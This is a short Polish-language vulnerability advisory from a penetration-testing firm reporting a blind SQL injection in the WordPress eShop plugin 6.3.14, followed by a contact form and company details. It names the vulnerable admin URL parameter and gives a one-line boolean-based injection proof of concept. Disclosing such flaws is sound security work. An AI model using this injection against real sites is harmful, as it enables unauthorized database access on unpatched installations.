Blind SQL Injection - WordPress Plugin eShop

Realizując prace związane z Testami Penetracyjnymi platformy ecommerce uruchomionej na silniku WordPress naszego Klienta nasi pentesterzy odnaleźli podatność Blind SQL Injection w pluginie eShop.

Podatność odnaleziona w pluginie WordPressa eShop w najnowszej wersji 6.3.14 pozwala na wykonanie ataku SQL Injection.
Plugin został pobrany z repozytorium pluginów WordPress ponad 631 tysięcy razy.
Aktualnie według repozytorium jest aktywnie używany na 9000+ aktywnych instalacjach WordPress.

Podatność

http://[site]/wp-admin/admin.php?page=eshop-downloads.php&edit=[SQLinjection]

PoC:

http://[site]/wp-admin/admin.php?page=eshop-downloads.php&edit=2 AND

3022=3022

Formularz kontaktowy

Imię i nazwisko (wymagane)

Adres email (wymagane)

Telefon

Wiadomość

Wyrażam zgodę na przetwarzanie moich danych osobowych zgodnie z ustawą o ochronie danych osobowych w celu (np. przesyłania informacji handlowej drogą elektroniczną zgodnie z ustawą o świadczeniu usług drogą elektroniczną) na podany w tym celu adres email (lub numer telefonu komórkowego lub inny kontakt elektroniczny). Podanie danych osobowych jest dobrowolne. Zostałem/am poinformowany/a, że przysługuje mi prawo dostępu do swoich danych, możliwości ich poprawiania, żądania zaprzestania ich przetwarzania. Administratorem danych jest REMOTE ADMIN SP. Z O. O. z siedzibą: 40-101 Katowice, ul Chorzowska 150.

REMOTE ADMIN SP. Z O. O.
40-101 Katowice, ul Chorzowska 150
Silesia Business Park - budynek B
piętro 5

E-mail:

kontakt@zdalnyadmin.com.pl

Telefon:
0048 32 323 14 19